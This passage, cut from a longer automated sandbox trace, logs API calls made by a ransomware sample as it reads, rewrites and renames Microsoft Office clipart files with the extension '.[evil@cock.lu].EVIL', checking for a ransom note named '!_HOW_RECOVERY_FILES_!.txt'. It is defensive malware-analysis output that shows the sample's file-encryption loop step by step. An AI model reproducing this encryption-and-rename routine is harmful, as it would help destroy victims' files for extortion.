Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01216_.wmf.[evil@cock.lu].evil")) returned 1 [0107.924] ??_V@YAXPEAX@Z () returned 0x1 [0107.927] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF", dwFileAttributes=0x200) returned 0 [0107.927] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.928] wcsstr (_Str="AN01218_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.928] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 69 [0107.928] wcscmp (_String1="AN01218_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.928] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN01218_.WMF") returned 0x0 [0107.928] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 0x45 [0107.928] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.930] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xbc4, lpOverlapped=0x0) returned 1 [0107.933] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.933] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.933] _errno () returned 0x84b1160840 [0107.933] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.933] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xbe0, lpOverlapped=0x0) returned 1 [0107.933] CloseHandle (hObject=0x1a8) returned 1 [0107.933] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.934] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.934] __uncaught_exception () returned 0x84b1160800 [0107.934] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.934] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf.[evil@cock.lu].evil")) returned 1 [0107.935] ??_V@YAXPEAX@Z () returned 0x1 [0107.938] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF", dwFileAttributes=0x200) returned 0 [0107.938] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.938] wcsstr (_Str="AN01251_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.938] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 69 [0107.939] wcscmp (_String1="AN01251_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.939] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN01251_.WMF") returned 0x0 [0107.939] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 0x45 [0107.939] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.941] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xac4, lpOverlapped=0x0) returned 1 [0107.943] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.943] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.943] _errno () returned 0x84b1160840 [0107.944] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.944] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xae0, lpOverlapped=0x0) returned 1 [0107.944] CloseHandle (hObject=0x1a8) returned 1 [0107.944] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.944] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.944] __uncaught_exception () returned 0x84b1160800 [0107.944] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.945] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf.[evil@cock.lu].evil")) returned 1 [0107.945] ??_V@YAXPEAX@Z () returned 0x1 [0107.948] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF", dwFileAttributes=0x200) returned 0 [0107.949] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.949] wcsstr (_Str="AN01545_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.949] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 69 [0107.949] wcscmp (_String1="AN01545_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.949] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN01545_.WMF") returned 0x0 [0107.949] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 0x45 [0107.949] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01545_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.951] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1ccc, lpOverlapped=0x0) returned 1 [0107.953] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.953] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.953] _errno () returned 0x84b1160840 [0107.953] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.953] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1ce0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1ce0, lpOverlapped=0x0) returned 1 [0107.953] CloseHandle (hObject=0x1a8) returned 1 [0107.953] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.954] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.954] __uncaught_exception () returned 0x84b1160800 [0107.954] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.954] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01545_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01545_.wmf.[evil@cock.lu].evil")) returned 1 [0107.954] ??_V@YAXPEAX@Z () returned 0x1 [0107.957] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF", dwFileAttributes=0x200) returned 0 [0107.957] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.957] wcsstr (_Str="AN02122_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.957] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 69 [0107.957] wcscmp (_String1="AN02122_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.957] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN02122_.WMF") returned 0x0 [0107.957] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 0x45 [0107.957] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.959] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1d74, lpOverlapped=0x0) returned 1 [0107.963] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.963] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.963] _errno () returned 0x84b1160840 [0107.963] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.963] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x1d80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1d80, lpOverlapped=0x0) returned 1 [0107.963] CloseHandle (hObject=0x1a8) returned 1 [0107.963] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.963] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.963] __uncaught_exception () returned 0x84b1160800 [0107.963] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.963] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf.[evil@cock.lu].evil")) returned 1 [0107.964] ??_V@YAXPEAX@Z () returned 0x1 [0107.967] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF", dwFileAttributes=0x200) returned 0 [0107.967] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.967] wcsstr (_Str="AN02559_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.967] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 69 [0107.967] wcscmp (_String1="AN02559_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.967] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN02559_.WMF") returned 0x0 [0107.967] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 0x45 [0107.967] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02559_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.969] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x19e8, lpOverlapped=0x0) returned 1 [0107.971] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.971] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.971] _errno () returned 0x84b1160840 [0107.971] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.971] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x1a00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1a00, lpOverlapped=0x0) returned 1 [0107.971] CloseHandle (hObject=0x1a8) returned 1 [0107.972] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.972] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.972] __uncaught_exception () returned 0x84b1160800 [0107.972] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.972] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02559_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02559_.wmf.[evil@cock.lu].evil")) returned 1 [0107.972] ??_V@YAXPEAX@Z () returned 0x1 [0107.975] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF", dwFileAttributes=0x200) returned 0 [0107.975] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.975] wcsstr (_Str="AN02724_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.975] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 69 [0107.975] wcscmp (_String1="AN02724_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.975] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN02724_.WMF") returned 0x0 [0107.975] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 0x45 [0107.975] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.977] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x83c, lpOverlapped=0x0) returned 1 [0107.980] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.980] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.980] _errno () returned 0x84b1160840 [0107.980] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.980] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x840, lpOverlapped=0x0) returned 1 [0107.980] CloseHandle (hObject=0x1a8) returned 1 [0107.980] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.980] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.980] __uncaught_exception () returned 0x84b1160800 [0107.980] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.980] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf.[evil@cock.lu].evil")) returned 1 [0107.981] ??_V@YAXPEAX@Z () returned 0x1 [0107.984] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF", dwFileAttributes=0x200) returned 0 [0107.984] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.984] wcsstr (_Str="AN03500_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.984] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 69 [0107.984] wcscmp (_String1="AN03500_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.984] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN03500_.WMF") returned 0x0 [0107.984] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 0x45 [0107.984] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an03500_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.985] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2418, lpOverlapped=0x0) returned 1 [0107.988] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.988] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.988] _errno () returned 0x84b1160840 [0107.988] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.988] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x2420, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2420, lpOverlapped=0x0) returned 1 [0107.988] CloseHandle (hObject=0x1a8) returned 1 [0107.988] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.988] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.988] __uncaught_exception () returned 0x84b1160800 [0107.988] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.988] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an03500_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an03500_.wmf.[evil@cock.lu].evil")) returned 1 [0107.989] ??_V@YAXPEAX@Z () returned 0x1 [0107.991] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF", dwFileAttributes=0x200) returned 0 [0107.992] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.992] wcsstr (_Str="AN04108_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.992] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 69 [0107.992] wcscmp (_String1="AN04108_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.992] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN04108_.WMF") returned 0x0 [0107.992] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 0x45 [0107.992] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.993] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x928, lpOverlapped=0x0) returned 1 [0107.996] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.996] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.996] _errno () returned 0x84b1160840 [0107.996] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.996] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x940, lpOverlapped=0x0) returned 1 [0107.996] CloseHandle (hObject=0x1a8) returned 1 [0107.996] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.996] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.996] __uncaught_exception () returned 0x84b1160800 [0107.996] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.996] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf.[evil@cock.lu].evil")) returned 1 [0107.997] ??_V@YAXPEAX@Z () returned 0x1 [0108.000] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF", dwFileAttributes=0x200) returned 0 [0108.000] FindNextFileW (in: hFindFile=0x84b11dd980, 